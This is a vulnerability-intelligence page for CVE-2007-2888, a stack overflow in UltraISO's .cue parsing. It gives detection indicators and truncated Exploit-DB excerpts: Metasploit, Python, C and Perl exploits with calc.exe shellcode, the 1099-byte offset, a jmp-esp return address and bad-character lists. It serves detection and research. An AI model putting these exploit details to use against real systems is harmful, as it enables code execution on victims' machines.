CVE-2007-2888
published 2007-05-30CVE-2007-2888: Stack-based buffer overflow in UltraISO 8.6.2.2011 and earlier allows user-assisted remote attackers to execute arbitrary code via a long FILE string…
PriorityP345high7.6CVSS 2.0
AVNACHAuNCCICAC
EXPLOIT
EPSS
54.68%
98.9th percentile
Stack-based buffer overflow in UltraISO 8.6.2.2011 and earlier allows user-assisted remote attackers to execute arbitrary code via a long FILE string (filename) in a .cue file, a related issue to CVE-2007-2761. NOTE: some details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ezb_systems | ultraiso | <= 8.6.2.2011 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x46\x49\x4c\x45\x20\x22 (FILE ")
bytes↗
\x81\xc4\x54\xf2\xff\xff (add esp, 0xfffff254 stack pivot prepend encoder)
bytes↗
Metasploit calc.exe shellcode: \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49...
- →Trigger is a crafted .cue file with a FILE field containing a filename string of 1099+ bytes (overflowing a fixed-size stack buffer); a companion .bin file with the same base name must exist in the same directory. ↗
- →Detect anomalously long FILE field values in .cue files: the exploit uses 1099–1100 'A' (0x41) bytes before the overwritten return address. ↗
- →Opening either the .cue or the .bin file triggers the vulnerability; both files must share the same base name and reside in the same directory. ↗
- →Bad characters for payload encoding are null byte, LF, CR, and double-quote (\x00\x0a\x0d\x22); presence of these in the FILE field of a .cue file is normal, their absence in an otherwise oversized field is suspicious. ↗
- →The Metasploit module prepends a stack-pivot stub (\x81\xc4\x54\xf2\xff\xff) before the payload; scan for this byte sequence inside .cue FILE field content. ↗
- →A jmp-esp gadget at 0x77f84143 (ntdll/kernel32 on XP SP2) is used as the return address; little-endian bytes \x43\x41\xf8\x77 at offset 1099 in the FILE field indicate exploitation. ↗
- ·Return address offsets differ between UltraISO versions: 0x00594740 for v8.6.2.2011 portable and 0x0059170c for v8.6.0.1936; exploits targeting one version will not work reliably against the other. ↗
- ·The PoC and exploits were tested on Windows XP Service Pack 2 only; reliability on other Windows versions is not confirmed. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
UltraISO - '.cue' File Parsing Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2007-2888 UltraISO - '.cue' File Parsing Buffer Overflow (Metasploit)
UltraISO - '.cue' File Parsing Buffer Overflow (Metasploit)
---
##
# $Id: ultraiso_cue.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'UltraISO CUE File Parsing Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in EZB Systems, Inc's
UltraISO. When processing .CUE files, data is read from file into a
fixed-size stack buffer. Since no bounds checking is done, a buffer overflow
can occur. Attackers can execute arbitrary code by convincing their victim
to open an CUE f
Exploit-DB
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (2)
exploitdb·2007-05-28
CVE-2007-2888 UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (2)
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (2)
---
#
#ultra iso exploit
#thomas . pollet @ gmail . com
#
import struct
scode=(#metasploit calc.exe shellcode
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x4b\x38\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x
Exploit-DB
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)
exploitdb·2007-05-28
CVE-2007-2888 UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)
---
/*
Date : May 28th 2007.
UltraISO executes calc.Don't
forget you need to have the bin and cue file in the same
Directory special thanks to Thomas Pollet also.
*/
#include
#include
//Calc shell_code
unsigned char shell_code[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x4b\x38\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\
Exploit-DB
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (PoC)
exploitdb·2007-05-24
CVE-2007-2888 UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (PoC)
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (PoC)
---
#!/usr/bin/perl
############################################################
#Credit:To n00b for finding this bug and writing poc.
############################################################
#Ultra ISO stack over flow poc code.
#Ultra iso is exploitable via opening
#a specially crafted Cue file..There is
#A limitation that the user must have the bin
#file in the same dir as the cue file.
#This is the reason i have provided the
#Bin file also Command execution is possible
#As we can control $ebp and $eip hoooooha.
#I will be working on the local exploit
#as soon as i get a chance this should be a straight forward
#to exploit this as we already gain control of the
#$eip register..
#Tested on :win xp service pack 2
#Vendor'
Metasploit
UltraISO CUE File Parsing Buffer Overflow
metasploit
UltraISO CUE File Parsing Buffer Overflow
UltraISO CUE File Parsing Buffer Overflow
This module exploits a stack-based buffer overflow in EZB Systems, Inc's UltraISO. When processing .CUE files, data is read from file into a fixed-size stack buffer. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an CUE file. NOTE: A file with the same base name, but the extension of "bin" must also exist. Opening either file will trigger the vulnerability, but the files must both exist.
No writeups or analysis indexed.
http://osvdb.org/36570http://secunia.com/advisories/25384http://www.securityfocus.com/bid/24140https://exchange.xforce.ibmcloud.com/vulnerabilities/34485https://www.exploit-db.com/exploits/3978http://osvdb.org/36570http://secunia.com/advisories/25384http://www.securityfocus.com/bid/24140https://exchange.xforce.ibmcloud.com/vulnerabilities/34485https://www.exploit-db.com/exploits/3978
2007-05-30
Published